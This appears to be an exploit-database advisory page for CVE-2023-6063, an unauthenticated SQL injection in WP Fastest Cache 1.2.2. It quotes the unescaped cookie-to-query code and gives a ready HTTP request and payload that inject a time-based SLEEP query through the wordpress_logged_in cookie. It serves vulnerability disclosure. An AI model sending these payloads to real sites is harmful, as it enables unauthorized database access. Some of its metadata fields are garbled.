Unauthenticated SQL Injection in WP Fastest Cache 1.2.2

vendor:

WP Fastest Cache

by:

Meryem Taşkın

6.1

CVSS

HIGH

SQL Injection

CWE

Product Name: WP Fastest Cache

Affected Version From: 1.2.2002

Affected Version To: 1.2.2002

Patch Exists: YES

Related CWE: CVE-2023-6063

CPE: a:wp_fastest_cache:wp_fastest_cache:1.2.2

Metasploit:

Other Scripts:

Platforms Tested: WordPress

2023

Unauthenticated SQL Injection in WP Fastest Cache 1.2.2

An SQL injection vulnerability was found in WP Fastest Cache plugin version 1.2.2. This vulnerability allows an unauthorized attacker to execute SQL queries on the system.

Mitigation:

To mitigate this vulnerability, users should update their WP Fastest Cache plugin to a patched version.

Source

Exploit-DB raw data:

# Exploit Title: Unauthenticated SQL Injection in WP Fastest Cache 1.2.2
# Date: 14.11.2023
# Exploit Author: Meryem Taşkın
# Vendor Homepage: https://www.wpfastestcache.com/
# Software Link: https://wordpress.org/plugins/wp-fastest-cache/
# Version: WP Fastest Cache 1.2.2
# Tested on: WP Fastest Cache 1.2.2
# CVE: CVE-2023-6063
 
## Description
An SQL injection vulnerability exists in version 1.2.2 of the WP Fastest Cache plugin, allowing an attacker to trigger SQL queries on the system without authentication.
 
## Vuln Code
 
public function is_user_admin(){
            global $wpdb;
            foreach ((array)$_COOKIE as $cookie_key => $cookie_value){
                if(preg_match("/wordpress_logged_in/i", $cookie_key)){ 
                    $username = preg_replace("/^([^\|]+)\|.+/", "$1", $cookie_value); 
                    break;
                }
            }
            if(isset($username) && $username){            
                $res = $wpdb->get_var("SELECT `$wpdb->users`.`ID`, `$wpdb->users`.`user_login`, `$wpdb->usermeta`.`meta_key`, `$wpdb->usermeta`.`meta_value`
                                       FROM `$wpdb->users`
                                       INNER JOIN `$wpdb->usermeta`
                                       ON `$wpdb->users`.`user_login` = \"$username\" AND  # $username varible is not escaped vulnerable to SQL injection
                                       .....
 
## Exploit
GET / HTTP/1.1
Cookie: wordpress_logged_in_1=%22%20AND%20%28SELECT%201%20FROM%20%28SELECT%28SLEEP%285%29%29A%29%20AND%20%221%22%3D%221
Host: meryem.local
 
## Parameter: Cookie #1* ((custom) HEADER)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: wordpress_logged_in_dsadasdasd=" AND (SELECT 3809 FROM (SELECT(SLEEP(5)))RDVP) AND "HQDg"="HQDg
---
 
## References
- [WPScan Blog Post](https://wpscan.com/blog/unauthenticated-sql-injection-vulnerability-addressed-in-wp-fastest-cache-1-2-2/)
- [WPScan Vulnerability](https://wpscan.com/vulnerability/30a74105-8ade-4198-abe2-1c6f2967443e/)
- [CVE-2023-6063](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6063)
 
## Credits
- Original Researcher: Alex Sanford
- PoC: Meryem Taşkın